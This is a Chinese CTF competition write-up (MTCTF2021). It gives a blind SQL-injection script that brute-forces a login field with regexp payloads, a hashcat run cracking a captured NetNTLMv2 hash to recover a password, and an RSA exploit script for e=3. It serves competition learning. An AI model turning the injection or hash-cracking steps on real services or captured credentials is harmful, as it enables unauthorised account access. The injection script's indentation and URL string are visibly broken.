MTCTF2021 部分WriteUp

2021-05-27 5,247


MTCTF

Web

sql


黑名单了引号,username填反引号,之后正则注入,注意略过特殊$ . * ? ^:


import requests
import time
def str2int(mystr):
    i = 0   
    myint = 0    
    while (i < len(mystr)):  
        myint += ord(mystr[i]) * pow(pow(2, 8), len(mystr) - i - 1)        
        i += 1    
    return myint
sess = requests.Session()
url = ' 
f = '账号或密码错误'  # 错误时网页包含内容
y = 'flag is not here'  # 正确时网页包含内容
start = 0  # 字符串的开始字符位置
strlen = 80  # 待爆破字符串的长度
sleep_time = 0
ostr = '^'
# str2find = '(database())' # CTF
# str2find = 'password' # This_1s_thE_Passw0rd
str2find = 'username'
# str2find='(select flag from flag)' # 想查询的字符串、语句;可能需要外加括号
# str2find='(select `2` from (select 1,2 union select * from user)a limit 1,1)'
for j in range(start, start+strlen):
    for i in range(32, 127):  # 可见字符范围        
    # for i in range(95,127):#可见字符范围        
    if i == 46 or i == 42 or i == 43 or i == 63 or i==94:  # 略过一些特殊符号($ . * ? ^等)  
       continue        
    time.sleep(sleep_time)        
    # regexp binary 0x5e61;        
    temp_str = ostr+chr(i)        
    ent = '{} regexp binary {}'.format(          
        str2find, hex(str2int(temp_str)))  # 待判断的事实语句        
    payload = "||{}#".format(ent)  # 注入语句       
    # print(payload)        
    # exit()        
    # data数据包的构造        
    data = {        
        'username': '\',            
        'password': payload.replace(' ', '/**/')        
    }        
    sess.get(url)        
    res = sess.post(url, data=data)        
    res.encoding = res.apparent_encoding  # 中文编码        
    text = res.text        
    if f in text:         
       continue        
    elif y in text:          
       ostr += chr(i)            
       print(ostr, j)            
       break        
    else:  # 即非正也非负的异常情况         
       print('error:', text)            
       break
print(ostr)


注入出password后登录,得flag。



Misc

Misc1
获得vhd文件,360压缩直接解压



获得一堆内容,看似是条形码内容,按照默认顺序逐一拼接
 

获得四不像,啥也不是
猜测顺序可能是按照扇区拼接把vhd丢入winhex
 

按照扇区排序,重新手动拼接获得图片
 

扫码获得文字EuO9&cDH打开flag.exe,是这个的密钥
直接输入,获得flag.txt


Misc3

ntlvm2 请求流程
1.客户端向服务器发送一个请求,请求中包含明文的登录用户名。服务器会提前存储登录用户名和对应的密码hash
2.服务器接收到请求后,生成一个16位的随机数(这个随机数被称为Challenge),明文发送回客户端。使用存储的登录用户密码hash加密Challenge,获得Challenge1
3.客户端接收到Challenge后,使用登录用户的密码hash对Challenge加密,获得Challenge2(这个结果被称为response),将response发送给服务器
4.服务器接收客户端加密后的response,比较Challenge1和response,如果相同,验证成功
NTLMv2的格式为:
username::domain:challenge:HMAC-MD5:blob
username: nanming
domain :MicrosoftAccount


challenge为NTLM Server Challenge,domian由数据包内容获得(IP或者机器名)
Challenge:6a99833ddd690e7a


HMAC-MD5对应数据包中的NTProofStr



NTProofStr:
980a5dc38aaff466c367eff70bcf80cb
response:   010100000000000042325524355ed601421c***9516bc2e90000000002001e00570049004e002d004f004d004b004100540046003300520047004a00470001001e00570049004e002d004f004d004b004100540046003300520047004a00470004001e00570049004e002d004f004d004b004100540046003300520047004a00470003001e00570049004e002d004f004d004b004100540046003300520047004a0047000700080042325524355ed6010600040002000000080030003000000000000000010000000020000011ac824d212777625c616fadbb6dd0dfaf35a8e4d93f7960ec1eac5592e7cfde0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00330031002e00370035000000000000000000



根据数据包名可知密码为八位前4为pass,我们生成对应的密码
crunch 8 8 -t pass%%%% >> 1.txt
尝试破解


└─#  hashcat -m 5600  nanming::MicrosoftAccount:6a99833ddd690e7a:980a5dc38aaff466c367eff70bcf80cb:010100000000000042325524355ed601421c***9516bc2e90000000002001e00570049004e002d004f004d004b004100540046003300520047004a00470001001e00570049004e002d004f004d004b004100540046003300520047004a00470004001e00570049004e002d004f004d004b004100540046003300520047004a00470003001e00570049004e002d004f004d004b004100540046003300520047004a0047000700080042325524355ed6010600040002000000080030003000000000000000010000000020000011ac824d212777625c616fadbb6dd0dfaf35a8e4d93f7960ec1eac5592e7cfde0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00330031002e00370035000000000000000000  /root/1.txt -o found.txt --force
-m 选择类型 5600    --force 强制执行
hashcat (v6.1.1) starting...
 
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Common KVM processor, 5844/5908 MB (2048 MB allocatable), 4MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
Host memory required for this attack: 65 MB
 
Dictionary cache hit:
* Filename..: /root/1.txt
* Passwords.: 10001
* Bytes.....: 90008
* Keyspace..: 10001
 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: NANMING::MicrosoftAccount:6a99833ddd690e7a:980a5dc3...000000
Time.Started.....: Sun May 23 18:29:23 2021, (0 secs)
Time.Estimated...: Sun May 23 18:29:23 2021, (0 secs)
Guess.Base.......: File (/root/1.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    42913 H/s (5.34ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4096/10001 (40.96%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/10001 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: pass0000 -> pass4094
 
Started: Sun May 23 18:29:20 2021
Stopped: Sun May 23 18:29:25 2021
 
┌──(root💀kali)-[~]
└─# cat found.txt
NANMING::MicrosoftAccount:6a99833ddd690e7a:980a5dc38aaff466c367eff70bcf80cb:010100000000000042325524355ed601421c***9516bc2e90000000002001e00570049004e002d004f004d004b004100540046003300520047004a00470001001e00570049004e002d004f004d004b004100540046003300520047004a00470004001e00570049004e002d004f004d004b004100540046003300520047004a00470003001e00570049004e002d004f004d004b004100540046003300520047004a0047000700080042325524355ed6010600040002000000080030003000000000000000010000000020000011ac824d212777625c616fadbb6dd0dfaf35a8e4d93f7960ec1eac5592e7cfde0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00330031002e00370035000000000000000000:pass1952


Crypto

easy_RSA



已知条件,n,e=3,encrypt(m+1),encrypt(m),通过下面联立公式,得到m的结果

 

 

EXP:python
import gmpy2
from libnum import *
n=int("0x9371c61a2b760109781f229d43c6f05***de65aa2a674ff92334cb5219132448d72c1293c145eb6f35e58791669f2d8d3b6ce506f4b3543beb947cf119f463a00bd33a33c4d566c4fd3f4c73c697fa5f3bf65976284b9cc96ec817241385d480003cdda9649fa0995b013e66f583c9a9710f7e18396fbf461cb31720f94a0f79",16)
e=3
c1=int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffbbd5a5e1a10f686c3f240e85d011f6c8b968d1d607b2e1d5a78ad6947b7d3ec8f33ad32489befab601fe745164e4ff4aed7630da89af7f902f6a1bf7266c9c95b29f2c69c33b93a709f282d43b10c61b1a1fe76f5fee970780d7512389fd1",16)
c2=int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffc5c26b0c12bcff9f697f274f59f0e55a147768332fc1f1bac5bbc8f9b***8104f232bdd20091d26adc52e36feda4a156eae7dce4650f83fabc828fdcfb01d25efb98db8b94811ca855a6aa77caff991e7b986db844ff7a140218449aaa7e8",16)
a = 3
b = 3
c = c1-c2+1
det = gmpy2.iroot(b**2 - 4*a*c, 2)
#以上操作结果
det = 419924980211305067664086451929469473556246023638897570322178499116255792376077397263806409834463657927723353414807
solu = (det - b)//(2*a)
print(n2s(solu))

 

得到压缩包密码
the key is :
everything_is_easy_in_this_question
 
压缩包解出得到的文件使用:XOR密钥重用攻击破解密文
 



得到flag{it_1s_P@dd1n_@nd_p@d}

本文作者:Timeline Sec

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/159654.html

Tags:
评论  (0)
快来写下你的想法吧!

Timeline Sec

文章数:23 积分: 190

欢迎关注公众号Timeline Sec

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号